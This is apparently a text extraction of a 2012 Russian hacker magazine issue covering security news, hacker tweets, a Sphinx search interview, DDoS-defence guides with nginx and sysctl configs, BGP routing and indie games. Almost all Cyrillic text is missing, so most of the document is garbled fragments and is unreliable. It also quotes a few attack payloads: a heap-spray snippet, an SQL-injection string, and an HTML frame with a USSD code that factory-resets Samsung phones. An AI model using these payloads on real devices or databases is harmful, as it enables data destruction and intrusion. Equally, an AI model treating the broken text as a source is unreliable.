INDIE-:

100

036

WWW.XAKEP.RU

11 (166) 2012

WINDOWS

HOWTO:
-
Raspberry Pi

: 230 .

18+
018

084

SPHINX:

058

128

DDOS

step (step@real.xakep.ru)

Andrushock (andrushock@real.xakep.ru)

(ilembitov@real.xakep.ru)

(kurchenko@real.xakep.ru)

PCZONE UNITS

(ilembitov@real.xakep.ru)

(goltsev@real.xakep.ru)

UNIXOID SYN/ACK

Andrushock (andrushock@real.xakep.ru)

MALWARE

Dr. Klouniz (alexander@real.xakep.ru)

PR-

(grigorieva@glc.ru)

DVD

ant (ant@real.xakep.ru)

Unix-

Andrushock (andrushock@real.xakep.ru)

Security-

D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)

PUBLISHING
, 119146, . , 1- ., . 5
.: (495) 934-70-34, : (495) 545-09-06

-
.: (495) 935-70-34, : (495) 545-09-06

DDOS

E-mail: advert@glc.ru

- . ,
, :
. DDoS. , ,
, .
,
.

( Anonymous).

:
,
. : ,
DDoS?
? , .
Qrator, ,

DDoS-. , , -, , -, ,
-, .
:
DDoS .

Step ,
][
twitter.com/stepah

(kosheleva@glc.ru)

(dolganova@glc.ru)

(dmitryuk@glc.ru)

DVD-: claim@glc.ru.

- : http://shop.glc.ru
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
: , 125367, . , , . 10, 1
,
77-50451 04 2012 .
Scanweb, . 210 700 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

Content
006

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017

The Pirate Bay,
, 2009

-

Facebook
Proof-of-concept
Byzantium Linux:

COVERSTORY

018

Sphinx

COVERSTORY DDoS: D S
, ,
. ,

024 DDoS
030 DDoS
032

PCZONE
036

040
046

Indie Game: The Story

: ,



Sublime Text 2
jQuery-

100

105

110

X-MOBILE
050

054
058

,


Android

Android

112

062

068
074
080
084

090
094

124

- Raspberry Pi

Easy Hack



-


-
Netzob

IDAPython
X-Tools
7

MALWARE

046

Windows
, ACL/DACL

Linux

LXC

SYN/ACK
128
133

Windows-

FERRUM
138
139

ASUS O!Play Media Pro

Upgrade
OCZ VERTEX 4 25SAT3-256G
Vertex

140
143

096

Highload. 5

UNIXOID
118

PHREAKING

C#
Unity 3D
Windows Phone



,

144

105

FAQ

8,5
WWW2
web-

MEGANEWS
APPLE
12

IOS 6


iPhone 5 Cydia.

SONY .

Apple. ,
AntiSec 12 UDID Apple. ,
!
, Pastebin
(, , ). ,
, ?
,
,
,
.
. Apple, , , ,
UDID.
.

, Blue Toad , .
, , 98%.
, , .

iOS 6, ,
,
UDID. Apple


.

WINDOWS SERVER
2012, 100%-
PowerShell Metro,
.

004

.

,
20 .

Sony ,
. ,
Sony .
Sony. ,
, , -. NullCrew, e-mail
Sony, , . ,
Sony, .
Sony :
400 ,
. ,
, Sony. ,
, , , ,
.
,
LulzSecurity ,
Sony.

ICQ
, 30,8 20,5 . , Mail.Ru Group ,

.

RUSSIAN CODE
CUP 2012,
3000
.
10 000 .

FACEBOOK

.
( )

TechCrunch Disrupt.

11 /166/ 2012

 ,
.

KYOCERA. , .

KYOCERA, FS-1135MFP
,
. ,
?
:
35 4
ECOSYS
,

KYOCERA. .

+7 (495) 741 00 04 www.kyoceradocumentsolutions.ru

KYOCERA Document Solutions www.kyoceradocumentsolutions.com

MEGANEWS

-, RaspberryPi: is.gd/KgFVYb.

THE PIRATE BAY

,



, TPB
:
Google

.

2009 30 ( 4,3 ).
, ,
, .
,
, . ,
, ,
.
, ,
.
,
, .
,
, .
,
, .
. ,
-
Logica. - 2010
9000 . .

,
,
. ,
,
.
,

, .
, EPOC Emotiv System,

. , EPOC 299 .
NeuroSky,
MindWave, . ,
, .
.
, ? ,
. ,
:).

, 0 9 ,
EPOC.
16 , 90 .
,
.
PIN-
20% .

.
30% ,
60%! , Emotiv, NeuroSky
, . API

.
, ,
. ,
,
,
510 .

APPLE VS SAMSUNG:

,


006

11 /166/ 2012

MEGANEWS

, 2011 Subway 10 , 7 21 .

P2P-,
TOR

III, IMDEA
Networks . The Pirate
Bay , ( -)
, IP-
,
. -10 :

reddit
,
, .
- , -
ZeuS,
, , IRC, DDoS . , ,
Tor, ,
. Tor.
, ,
G Data Security Labs -. P2P-,
Tor,
, reddit.
G Data Security Labs ,
IRC-, .
,
:
, .

, IRC,
Tor.

1
2
3
4
5

TvTeam
scenebalance
XxXRG
sceneline
digital_ripper

3808
2359
1225
993
870

IP
924
795
63
244
38

ICM,
.
ICM :

10 000 ,

reddit,

5001000
. , ,

:

Bitcoin,
50
.

HEWLETT-PACKARD
- Open webOS
Apache 2.0, . ,
webOS

.

HP
, ,
.

008

Google
PageRank

alexa.com

rutracker.org
tfile.ru
rutor.org
kinozal.tv
my-hit.ru

4500
1100
950
900
850

6
4
6
5
4

281
2551
1296
2240
1262

(,
, ) ,
uniongang.tv ( ), relizlab.org rutor.org.
kikteam.net .

.

3 30

.

ZEROACCESS
1
,
Sophos.

100 000 .

11 /166/ 2012

MEGANEWS

.RU 17 2012 .

APPLE
IPHONE
Apple , . , iPhone, .
4S (
), .
A6, .
18% ( 7,6 ) 20%
( 112 ), iPhone 4S. iPhone 5
1136 640 .
iPhone 5 8 .
F/2,4. Full HD,
.
8- Lightning
( 80% ,
iPhone). , . ,
,
, , ,
,
. , Apple 30 pin
29 , Lightning-USB 19 . ,
, Apple , , Lightning iPhone iPod
.
, .
Apple NFC iPhone 5.
,

, .
- Apple , NFC
- ,
Passbook, .
,
iPhone 5 , Apple .
iPhone 5 ,
.
Apple 700 .

Apple iPhone 5,

, iPhone 4S,
(

).

, iPhone 5
Apple iPod,
EarPods,
, iOS6,
.

- TREND MICRO :

,



010

11 /166/ 2012

#hacker tweets
@0xcharlie

security- Twitter.
!

@Code_Analysis

? cout <<
(sizeof(char *) == 8) ? "64-bit" :
"32-bit"; . :
http://www.viva64.com/en/b/0162/ #cpp

-
-. ;)

tmux.

8)

@thomasbeagle

: Java

Java-. , ?

@garethheyes

JS pr : Error().
stack try catch.

@WTFuzz

HeapSpray
@ 0x10000:document.
createElement('canvas').
getContext('2d').
createImageData(0x10000000/4-0x20,1); .data
= byte[]

@dlitchfield

, ? Qualys
BrowserCheck Chrome
Windows
0x10000000? #DERP #FAIL #ASLR pic.twitter.
com/NuDv5IRQ
, , 8)

, , ( INFO-BEZ
EXPO 2012 Security Awards FAIL ;) ):
#lulz #0-dayz
@NTarakanov

+ : ! ,
,
0-dayz?

, ,
-,
.
()
,
.

HTML5
HeapSpray 8)

@NTarakanov

@ryanaraine

! Apple iTunes c
160+ (CVE).

2012-,

,
METHOD_BUFFERED ,
METHOD_NEITHER.

@indi303

1 : man screen man

@NTarakanov

@corelanc0d3r

99 Java-,
patch.

@djrbliss

VOP
(Victory-Oriented Programming).
ROP/JOP/__OP,
VOP? .

, :)

@noahphex

,
.

@fdfalcon

-
SMS- SQL-?
1) . 2) . 3); drop table
answers;--

11 /166/ 2012

011

MEGANEWS

GOOGLE IE 8 GOOGLE APPS, Statounter.

GALAXY

GO DADDY

SAMSUNG
Ekoparty ,
,
Ekoparty Samsung.
: Samsung TouchWiz,
, , Galaxy S II S III.
, , ( ) USSD-, (*),
(#) . , tel:. ,
- USSD- ,
NFC QR-.
HTML- <frame src="tel:*2767*3855#" /> USSD *2767*3855#, .
, , .
hugelaser.com/ac/ussdtest.php?conf=true. IMEI-, ,
, .

Samsung Galaxy S III 20 ,

S III Samsung .

NVIDIA
,
Tegra Intel ARM.

012

DRAM
50%
49%, IHS
iSuppli.
.

MICROSOFT Windows 7

(42,76%), Net
Applications. :
Mac OS X 7,13%.

Go Daddy,
50 . -
, DNS- CNS1.SECURESERVER.NET,
CNS2.SECURESERVER.NET CNS3.SECURESERVER.NET
.

,
Verisign,
. Anonymous
Own3r, .
,
, , ,
.
Go Daddy . , ,
AntiSec, ,
.
Go Daddy ,
,
.

39%

,
.
.

INTEL ,

INTEL WIRELESS
CHARGING TECHNOLOGY.

.

11 /166/ 2012

 MICROSOFT ID Hotmail 16 .

GOOGLE?

(blog.jitbit.com),
. Adblock
( ) Google. , ,
81,5% 1280 960! 18,5% .
1920 1080
, . ,
, ?
, . . 45
5 ( ,
10 57)!

. , , Google
2007 , , 50% .

2.0 BLACKHOLE EXPLOIT KIT

, BLACKHOLE ,
-

11 /166/ 2012

. ,
362 2012-
30%! ,
.
,
.
, .
, ,
,
, . ? ,
,
,
, ,
. sci-fi.
, , , . ,

, 5% , , ,
.
1,52 (
80 ).
, . ,

, , , ,

.
,
, ,
.
, , , . ,
, ,
.
,
, .
.

013

MEGANEWS

CRIME

TLS SPDY

:
GOOGLE
,
GOOGLE . ?

BEAST

Liveinternet 2012 . ,
Chrome Google, , , ,
44,5% 43,2%.
, .
, ,
, 2011 Google ( )
. Chrome
Google. , ,
, ,
- ,
.
,
,
. ,
. Google
, , , IE
. ,
,
..
, uTorrent, Daemon Tools .
, , , .

, Chrome
Firefox.

.
BEAST, SSL/
TLS-.
CRIME (Compression Ratio Info-leak Made Easy)
SSL/TLS SPDY.
TLS . ,
. CRIME
zlib , BEAST.

,
JavaScript , cookie,
. ,
. ,
cookies, , , zlib
, .
, SSL/TLS.
, .

E INK

IFA 2012:
, e-ink-
. , ,


.

014

,
.

IPV4 .
IP- IPv4 /8

,
RIPE NCC.

11 /166/ 2012

KICKSTARTER . .

Apple
. , ,
, Android
, .
Amazon Kindle,
e-ink, ,
.
Kindle Fire . Android 4.0.
Kindle Fire ,
40% , (1 ) . -
159 .
, . Kindle
Fire HD : 7- 8,9-
( 1280 800 1920 x 1200 ). ,
.
OMAP 4.470 Texas Instruments, ,
Amazon, Tegra 3,
1 . HD-, HDMI-, Bluetooth
. : Kindle Fire HD LTE. ,

Wi-Fi-.
40%.
499 .
Amazon Barns and Noble . , , Amazon,

Motorola, HTC LG , Motorola

RAZR i Android 4.0 Intel
Atom 2,0 . Motorola
Intel, . ,
Motorola .

.
NOOK ,
. , NOOK HD
7- TI OMAP
4470 1,3 , 1 , 8 16 . , GL Benchmark
60 , , Kindle
Fire HD. NOOK HD 8 200, 16
230 .
Google Acer
.
Android, ,
Acer Acer CloudMobile
A800. ?
Aliyun, Alibaba
Cloud Computing. Linux, Alibaba
2011 . Aliyun OS
(Tianyu Haier). Acer
Google, ,
- . .

BLIZZARD

WORLD OF WARCRAFT

,
USER ID, TIME
REALM ASCII
11 /166/ 2012

015

HEADER

FACEBOOK
,
,
( ),
. ,

,
.
Facebook ,
. ,
,
,
.

, ,
Open
Graph. , iOS Apple
Facebook .

,
Facebook.
? .

5
1.
!

, .
( )
. ,
, .
2.

code review.
,
-
.

, Phabricator.
.

016

Differential
code review.
Maniphest -.
Herald
. , , :
- ,
,
,
. ,
Diffusion
code-,
.
- ,
, ,
, Dropbox. , Facebook (phabricator.org),

.
4. Facebook feature
brunch
,
. ?
,
.
Facebook? ,

GateKeeper ,
.

Facebook, .
, ,
,
.
launch ,
(, 10%
).
5.
(
Facebook),
.
,

.
,
. ,
(
Phabricator), ,
.
Facebook

,
.
.
. z

11 /166/ 2012

 (alizar@gmail.com)

Proof-of-Concept
BYZANTIUM LINUX:

, ?
, , . C ,
. ,

. ,
,
( Byzantium ) .
, .
, .

Byzantium (mesh
network) 802.11
.
,
, , , .
HacDC (hacdc.org) OSI layer 2 802.11,
. Wi-Fi . OSI
layer 3 () 70 -

. 1.
- ,

11 /166/ 2012

. 2.

: . bit.ly/SHaSBa. Open 802.11s, Linux FreeBSD, OLSR (Optimized Link

State Routing), BATMAN-Advanced (Better Approach To Mobile Ad-hoc
Networking) Babel.
, .

.
Wi-Fi- .
.
Byzantium Linux
v0.2a (project-byzantium.org/
download). ISO- 460 .
, LiveCD
.
LiveCD . , memento mori.

(. 1),
(. 2),

(, SSL).
,
:
,
-. ,
. ,
P2P.
Byzantium Linux

. Byzantium Linux LiveCD.
-,
, : https://github.com/
Byzantium/Byzantium/issues. z

017

COVERSTORY

SPHINX

SPHINX
, The Pirate Bay, AVITO.ru, Craigslist,
Tumblr, Dailymotion ? ,
Sphinx.

,
. Depeche Mode,
,
, ][ Sphinx .

018

FREEBSD
300

Sphinx
Craigslist.

.
-. ,

. 130
, .
,
- , - ,
,
. ,
,
.
.
,

(jail FreeBSD). 128
200300
, , , .

mnoGoSearch ,
C++. -,
( )
.
.

.
.
24 !
, mnoGoSearch.
,
.
,
mnoGoSearch :).
:

. , control freaks, .
, .
,
,
, . , ,
,
.
- .
, , , ,
, , .
.

11 /166/ 2012

SPHINX

1030
Basic
14



,

game developer

10 15 /

200 400

1


300
, 40

Solr/
Lucene, ElasticSearch

11/166/ 2012

019

COVERSTORY
Depeche Mode I feel you. .
.
,

, ,
.

. ,
- ,
.
-
,
.
, .
,
. , ,
. ,

,
.
, .
, , - .

.
,
Percona,
MySQL. , ,
. ,
,
, ,
. ,
.
Sphinx
. : ,

(oper.ru).
, 50 50 ,
- .
99%
:
,
. ,
, .
Sphinx .
, . -

, ,
-
, . ,
.

.
. : ,
, ,
.
, .
?
.
,
1 1 000 000.
1 000 000
2 000 000. , .
,
-

.
, :
,
, ,
... ? .
, Sphinx,
,
. -
Sphinx
Apache Solr (
).

?

: ,
.
,
: , ,
,
,
(,
).
.
.
:
.
?
,
,
.

: ,

020

Microsoft Word!

, ,

, .
.

, . -.

, ,
. -
: ,
. (
)
.

, ,
?
, ,
, . .
: .
.
. ,
-.
Google, Yandex . , ,
,
.
, ?

,
, . .
. , ,
, ,
.
,
,
. 3000 (, ,
),
, .
,
.
.
sphinx, , , .
Google
IP-,
. , ,

.
,
,
.
, . ,

11 /166/ 2012

( Google ),

IP-, , , ,
. ,
, .

BM25
,
,
. :

,

,
, .

11/166/ 2012

. Open Source
.

, Open Source
( Open Source)
.

BM25, ( )
.
BM25 - 80-,
2000-
,
.
: BM25
. ,
,
,

, .
.
,
. , .

,
. BM25
, , ,
. .
, BM25
(TF), IDF
,
. ,

, , . , ,
,
, .
- , , .
.

( )
. TF
.
TF, IDF? IDF inverse document
frequency, , .

, .
,
.
, IDF.

.
TF (term frequency).
, .
. .
,
. ,
,
BM25? :
.
.
.
, .
. ,
. .
, BM25.
? ,
,
, (
),
,
, TF.

021

COVERSTORY
,
, IDF.
.
, .
TF (), ,
, .
TF , IDF
. ,
. .
, :
( BM25), Sphinx
. BM25,
? .
.
.
.
- .
:
,
. ,
.


,
. , ,
. , ,
.
,

022

.
,

.
, 25. , .
,
,
123 10,
20 30.
11, 48 92.
, 123
123
123
.

,
. .
.

.
.
,
.

.

. ,
.
. -

.

.
. TF?
. IDF? ,
.
,
LCS (Longest Common Subsequence) .
,
. ,
,

, .
.
page rank, .
? ,
.
, ,
. ,
,
123
, .

,
. ,
,

, , , .
,
.
Sphinx
. , .

,
MySQL.
. ,
,

.

, .
,
,
, .
BM25
?
,
, IDF.
,
,
,
.

, . - 12 ,

11 /166/ 2012

. : ,

,
,
,
.

SPHINX?
. Open Source
.
, .

. ,
,
, ,
. ? .
? .
, , Sphinx
The Pirate Bay. , ,

, .
- - Sphinx,
.
- e-mail
,
. .
,
- Sphinx. The
Pirate Bay . Mininova,
, .
RuTracker , .
, .
, Craigslist,
,
.
BoardReader, Social
Radar ,
Sphinx 20 . , ,
Sphinx, 100
1 . !
.
, Google, Facebook
Yahoo! Sphinx. ,
, -
,
,
, .

OPEN SOURCE
Sphinx, ,
,

11/166/ 2012

. . , ,
: ,
,
, !
.
,
MySQL , ,
- . , -
, Sphinx
.
. ,
.
,
Sphinx
, . .
Sphinx
.
,
API .
Sphinx ,
, ... , .
- : , .

. ,
,
. Open Source , ,
.
:
- .
,
. , , :).

,
, . , .
,
-
200 .
,
.
,
Sphinx . ,

GPL,

. .

MySQL c Oracle Red Hat

Microsoft. ,
,
Open Source . Open Source
, .
- ,
, ,

.

, .
-
,
. , ,
. .
.
,
.

.
,
. ,
-, : ,
.
: ,
, , , .
, , . , -, ... , -
,
!
( ).
?
, ,
-
. - , ,
,
.
e-mail, Skype
IRC . ,
- - , ,
.
.
. ,
IT, . Open
Source ,
. ,
: -! - C++ , - - , ,
, ... , ,
,
! . .

, , , , , ,
, , , ,
. z

023

COVERSTORY

, Qrator

DDOS
16
DDOS-

DDoS- , .
,
.
024

11 /166/ 2012

 DDoS

, .
, .

,
, Slowloris,
Apache, SYN-
, Amazon EC2.
DDoS .
WINDOWS SERVER
, ,
(2003 2008 ), DDoS
.

: ,
.
, Windows Server
, .
DDoS- ,
Linux. ( 2.6),
iptables ipset (
IP-), .
, .

APACHE
Apache. ,
, Apache,
nginx lighttpd.

Apache' , ,
, ( ) Slowloris,
.
Slowloris Apache Antislowloris.diff, mod_noloris, mod_antiloris, mod_limitipconn,
mod_reqtimeout... ,
HTTP-, Slowloris
. , nginx.

DDOS
, DDoS?
- HTTP-, grep ( ) , .
... . ,
, -. , . ,
, grep
IP-, .
, , ,
. :
grep,
. , , .

TESTCOOKIE
, ,
. DDoS,

testcookie-nginx (https://github.com/

11 /166/ 2012

kyprizel/testcookie-nginx-module),
@kyprizel. . , HTTP-,
HTTP cookie .

cookies , DoS-
JavaScript- (
). Testcookie-nginx
L7 DDoS-,
. ? HTTP
Redirect, JavaScript, ,
( JavaScript ,
, , Firefox, ). :
Set-Cookie + 301 HTTP Location;
Set-Cookie + HTML meta refresh;
, JavaScript.
,
AES-128
JavaScript.
Flash,
( Flash, , ), , , ( ). ,
testcookie-nginx . , ,
(
) nginx.
, testcookie :
, Googlebot. testcookie , ,
;
Links, w3m ;
,
JavaScript.
, testcookie_module . ,
, , Java C#,
. .
444
DDoS . ,
. ,

,
. ? .

, , .
Nginx 444, :

location /search {
return 444;
}

, , URL. , location /search (, ,

/search), ipset shell-:
ipset -N ban iphash
tail -f access.log | while read LINE; do echo "$LINE" | \
cut -d'"' -f3 | cut -d' ' -f2 | grep -q 444 && ipset -A
ban "${L%% *}"; done

025

COVERSTORY
- ( combined) , ,
cut .

.
SQL- explain.

444
.

, . , -
-- . ( ),
GeoIP , .
, :
1. nginx GeoIP- (wiki.nginx.org/HttpGeoipModule).
2. access log.
3. , -,
grep accesslog nginx .

,
, , . ,
, .
PHP,
. ,
,
, . !

, , ,
.
(POC)
, @SaveTheRbtz,
PyBrain,
(habrahabr.ru/post/136237). ,
:). , ,
, , ,
.
access.log DDoS',
100% , ,
dataset .
.

? DDoS , ? . .
, , , , -DDoS-

. .
, , -
, ,
DDoS- , , , ,
. , ,
- DDoS-,
, .
.
,
, . , , .

- PHP + MySQL
:

Xdebug , ;
APD
, ;

026

,
, .
. nginx

: request_time upstream_
response_time. ,
; , (Apache, php_fpm,
uwsgi...) . upstream_response_time
,
. :

log_format xakep_log '$remote_addr - $remote_user [$time_local] '

'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" $request_time \
$upstream_response_time';

combined- .


.
nginx

shell- (
ACCESS_LOG
nginx combined-):

echo $(($(fgrep -c "$(env LC_ALL=C date --date=@$(($(date \

+%s)-60)) +%d/%b/%Y:%H:%M)" "$ACCESS_LOG")/60))

, .
, , , ,
, , .
. , ,
.
,
.
TCPDUMP
, tcpdump
. .
2011- Linux,

TCP- TCP- SYN RST.

,
,
, . , , . : nginx
.

10

11 /166/ 2012

 DDoS

, ,
. , ,
, . Tcpdump .
,
, , , tcpdump' ,
. production' .

. ,
,
.
ngrep
.
?
DDoS-, ,
?
, .

. ,

, . ,
-

.
, ,
-, .
. ,
( )
, ,
, ? -.
, , , Google Analytics,
.

11

-
? ,
nginx , .
.
nginx.

( ) NGINX
?
.
.
.
nginx.
client_header_buffer_size
.

, ,
large_client_header_buffers.
large_client_header_buffers

.
client_body_buffer_size
.
,
.
client_max_body_size
, Content-Length .
, 413 (Request
Entity Too Large).

12

11 /166/ 2012

- NGINX
.
,

nginx.

reset_timedout_connection on;
,
FIN-WAIT.
client_header_timeout
- .
client_body_timeout
- .
keepalive_timeout
-, keep-alive
.
, ,
. -
HTTP- Keep-Alive, Internet Explorer ,

send_timeout
- .
, .

13

: - ? , .
.
,
( ), . ,
.
( -):
1. .
2. .
3.
. . 2.
4. .

/ . ,
AJAX long polling , , long polling -
20 , ,
.
NGINX
(LIMIT_CONN LIMIT_REQ)
nginx , .

,
, ,
, , nginx. ,
. ,
swap. , .
, /download /search. :
, ( download-) TCP-
;
, ( )

.

14

027

COVERSTORY
http {
limit_conn_zone $binary_remote_addr zone=download_c:10m;
limit_req_zone $binary_remote_addr zone=search_r:10m \
rate=1r/s;
server {
location /download/ {
limit_conn download_c 1;
# location
}
location /search/ {
limit_req zone=search_r burst=5;
# location
}
}
}

limit_
conn limit_req locations,
( , ).
,
,
.
10m . ,

10 .
320 000 TCP-.

$binary_remote_addr, IP-
,
$remote_addr. ,
limit_req_zone

DDOS
1.
. SYN 10 .
2.
DNS. UDP- DNS- spoof
IP-
.
( )
DNS-. , ,
.
3. , , .


5
, ,

.
4. ,
JavaScript, , .
,

.

028

IP, nginx,
, , ,
, $binary_remote_addr$http_user_agent $binary_remote_
addr$http_cookie_myc00kiez , , 32-
$binary_remote_addr,
10m .

nginx, .
net.ipv4.tcp_syncookies sysctl,
SYN-flood .

() .
. :

net.ipv4.tcp_fin_timeout
, TCP- FIN-WAIT-2 (
FIN/ACK-).
net.ipv4.tcp_{,r,w}mem
TCP. : ,
.
net.core.{r,w}mem_max
TCP .

15

100 / -
; c,
- :
sysctl
sysctl
sysctl
sysctl
sysctl

-w
-w
-w
-w
-w

net.core.rmem_max=8388608
net.core.wmem_max=8388608
net.ipv4.tcp_rmem='4096 87380 8388608'
net.ipv4.tcp_wmem='4096 65536 8388608'
net.ipv4.tcp_fin_timeout=10

: http://bit.ly/8U0SDq.
/PROC/SYS/NET/**
/proc/sys/
net/**. , , ,

. Linux- (
),
-
,
. ,
,
,
.

16

!
DDoS- e-commerce, , c
. -
. ,
. ,
. , DDoS- , ,
,
. z

11 /166/ 2012

COVERSTORY

DDOS


Low Orbital
Ion Cannon (LOIC) . ,
. ,
,
,
DDoS , , .
.

?
, LOIC
. .
JS LOIC
JS LOIC HTTP-.
: referer
, , URI,

- .
LOIC .
? .
.

030

LOIC UDP
LOIC UDP.
. UDP-
48 HTTP-. ?
UDP- www-?
access-. : LOIC TCP TCP-
.
? : ,
. - nginx, Varnish
.

HOIC
HOIC (High Orbit Ion Cannon) c
.
, , ,

.
URL, . ,
.

LOIC HTTP
, ,
LOIC HTTP. .
: GET / ,
,
. ,
,
.

, DDoS? LOIC / HOIC / JS LOIC / OWA /

SLOWPOST
. DDoS,
, , .

full browser stack: Flash,
cookie, , JavaScript. , ! - .
LOIC. ,
.

? ,
-, , . , Anonymous

SLOWPOST

Anonymous OWASP/SLOWPOST.

, ,
.
. ,
TCP-, :
bit.ly/tcpmanual.

11 /166/ 2012

 DDoS

, HLL

(
False Positives).
, .

LOIC?
- DDoS
.
, ,
. , ,
,
, ,
, . ,
,
- ][.

Facebook. (
DDoS). ,
. Google ,
, , , , .
,
. , ,
, .

Anonymous?
DSL-.
. -
. X. ,
Anonymous
: -
( ,
Sony )

,
. ,
,
.

3: .
:
.
.
4: mod_
security Apache , ,
.
: Apache, , 2012
.
,
.
5:
Snort regexp'
?
: :

userland regexp? ,
,
,
.

,
. ,
, .
1:
HTTP/1.0 + Host.
, -
, HTTP/1.0 Host.
:
.
.

: , , -, . (Eldar
Zaitov)
nginx. 15
cookbook
.

: ANONYMOUS VS. DNS?

Anonymous DNS-. ?
, ! DNS- BGP-anycast, ,
Qrator. , ,
. ,
BGP . Anonymous , ,
-, , .

11 /166/ 2012

2:
,
,
fingerprinting.
: , -, . Opera Mini
. False Positives.

-
.
.

, . DDoS . . DDoS-


. Anonymous, ,
!
. ,
, :). .
, ,
. z

031

COVERSTORY

, Qrator

:
,

DDoS- 40 /? .
. .

.

,
.

() IP- ,
,
.
. -,
( -
RIPE). :
( ,
);
( ,
);
( ,
, ).
-
BGP. - ,
(
, ).
AS_PATH.

032

prepend policy,
:
AS_PATH

222 333 444

222 333 333 333 444

333 ,
222. AS_PATH BGP : ,
AS_PATH , .
.
BGP
.
LOCAL_PREF,
,
AS_APATH. BGP
- : ,
, . . 1 , .
222 ,
( ).
222
. 222 .
,
default route, e .

:

:
1) ;
2) BGP;
3) ().
. ,
default route. , , ,

11 /166/ 2012

 : ,

loopback-
default route.
?
IP- ,
-.
, TTL. ?
.
, .
14 .
DDoS-. : echo
request, ping,
echo reply. source
IP- DDoS-
. ,
:
1) , ;
2) , ;
3) , .
. -, ,

Qrator. -, DDoS
.
, ,
, . 700 c .

:
BGP
, , ,
, -
. , BGP .

2 .
BGP , DoS-:
.
BGP-,
BGP-. : - .
BGP? , .

A
AS222
2.2.2.0/24
Default route
A

. 1

1. -, LOCAL_PREF.
,
. ,
BGP . BGP-, ,
,
. 30 .
,
,
. .
2. -
,
- default route.

(
default route).
3. BGP- prepend
policy .
- , ,
,
.

: ?
. . 2 , .
Tier-1 , ,
, .
, , 10%
. -

AC174
DDoS 17
Default route: 25
AC3356-AC3549
DDoS 8
BGP : 12 prefixes affected
Default route: 86
. 2

11 /166/ 2012

. 3

033

COVERSTORY
-, ,
80% .
. . 3 Tier-1
. Level3 DDoS-, 17 , 25
default route. Cogent ,
c , BGP-.
.
default route ,
, DDoS- .
,
. ,
, ,
( ). BGP- (. 4)
,
,
, , .
, BGP,
.

(. 5) 50%.

:
10%.

. ,
, .
. , ,
,
. -
, .
, . ,
. , ,
, abuse request. ? -, - ,
,
.
, , ,
. c (. 6).
, , , ,
. ,
. default
route, , ,
.

45%
40%
35%
30%
BGP

25%

Default Routes

20%

DDoS

15%
10%
5%
<1h

<2h

<4h

<8h

. 4

,
. ,
.
ASX2 50 DDoS-,
,
350 . .
destination IP
, source IP- 2.2.2.0/24,
40 . , ,
. ?
, , BGP- ,
BGP-, ,
, BGP, . ,
, .

?
. .
. ,
-. . .
P. S.
DDoS-.
,
.
,
,
, RIPE. z

16000

AC

BGP
2.2.2.0/24

14000
12000
10000

Max = 350*DDoS
> 50 amplifiers
Mean = 10*DDoS

8000

4
=
DDoS*4

6000
4000
2000

dst: aplifiers
src: 2.2.2.1

034

. 5

ASX1

ASX2

Default
route
= 40*DDoS

. 6

11 /166/ 2012

Preview

30 .
.

PC ZONE
36

INDIE GAME: THE STORY

Steam

.


.

. , Minecraft
!

,
, .

-!

PC ZONE

46

SUBLIME TEXT 2

, .
, .

PHREAKING

62

-
Raspberry Pi.
418. ,
.

11 /166/ 2012

X-MOBILE

50

must-have
Android iOS
.

84

Netzob

-
.

58

,
Tasker SL4A,
.

MALWARE

96

WINDOWS

Windows.

.

035

PC ZONE

Pinkerator

150 mm

24 mm

INDIE GAME:
THE STORY

53

5R

:
,

, 2012,
Scream School (
).
, : ,
.
,
Mafia,
Warhorse. -,
, , .
? !

,
-?
.
, ,
,
.

2003 , Valve
Steam.

, .
,
, AAA-

Steam. ,
,
.

036

Minecraft.
. Braid, Super Meat
Boy .

Independent Games Festival , Game
Developers Conference.
1999 , 2005-
Fire And Darkness Shattered
Galaxy, 2005- - . Gish, Darwinia, Crayon
Physics Deluxe .
IGF
,
95 .
, ,
,
.

. , Ludum Dare,
. .

Gaminator, gamin.
ru. ,
.

.
-
Indie Bundles.

,
. ,
,
.
, .

The Humble Indie Bundle V
599 003
5 108 509 . 500600
, .

Kickstarter,
.
,

Double Fine Adventure 2012 .
400 000 ,
. inXile entertainment
Wasteland 2 Stainless Games Carmageddon:
Reincarnation. !
, Kickstarter .
,
Amazon Payments.
Kickstarter ,
.

11 /166/ 2012

INDIE GAME: THE STORY

- Steam.
Valve
Steam Greenlight.
,
Steam .
Steam
,
.

. Diablo III
Metacritic
. , , , , , - , ,
. 60
,
.

, . , , , . ,
. .


, ? ?
-, .

.
,
roguelike.
-
PR-
.
, ,
, ,
.
,
, .
?

Tim (Braid)

Isaac (Binding of Isaac)

runs from his Mother

shoots tears

, ?
? !
,
.
.
,
.

,
. - ?
? ,
?
. ,
,
, . ,
.
MMORPG
, , ,
Blizzard
.

.

.
, .
,
, - ,

.

turns out to be the son of a bitch

can turn back time

drives princesses away

11 /166/ 2012

hates permadeath

.
?
PC, Mac Linux.
,
, ,
.


Unity Flash.

.
,
- .
, ,
1024 x 600 .
,
.

: , , ,


,
.
,
, .
, .
,
.
-. ,
,
. .
,
,
. ,

037

PC ZONE
, .
,
.
PR-
, .
-
. :
1. . -

.
2. . ,
, ,
,
,
e-mail
.
3. .
.


.
4. .
.
5.
, .
-
.
6. . .
,
.
-?

. ,
e-mail
. , , .

?
( ) -,
. Steam
.
,
.

.
, , ,

,
-
.

.
-. , ,
. ,
Retention
: , -

038

Super Meat Boy

hates Dr. Fetus

doesn't have skin

loves Bandage Girl

, 80% 40,
.
, Steam.
,
.
. ,
. .
, -
Valve .
,
Steam
. ,
.
Steam
.
.
Steam .
.
, .
, ,
.
,
,
e-mail.
.
,
.

.
,
.

Desura, , 500 .

. -

,
,
. , PayPal . , 30% .
- :
Desura IndieVania.
- , .
Desura
Steam, , ,
. 99 ,
.
Inner Dream
Desura . 24

- .
,
.
, , , Desura
Steam,
.
IndieVania

Desura,
.
-
Alientrap, ,
Capsized Nexuiz. , IndieVania
. -,
.
PayPal (5% + 0,05
)
.
,
.
-, -
. , . -

11 /166/ 2012

INDIE GAME: THE STORY

, .

1 .
, ,
45
.
, Desura, IndieVania ,
.
,
.
, ,
,
,
, ,
.
,
, ,
, -
.
, ,
10
. -
-, - .
, .
?

Humble Store -,

HIB. ,
.
, -
,
. ,
Steam- Steam -.
?
, Humble
Store BIT.TRIP RUNNER:
humblebundle.com/store/product/bittriprunner.
- Voxatron,
:
www.lexaloffle.com/voxatron.php.

ALPHA FUNDING

Alpha funding,
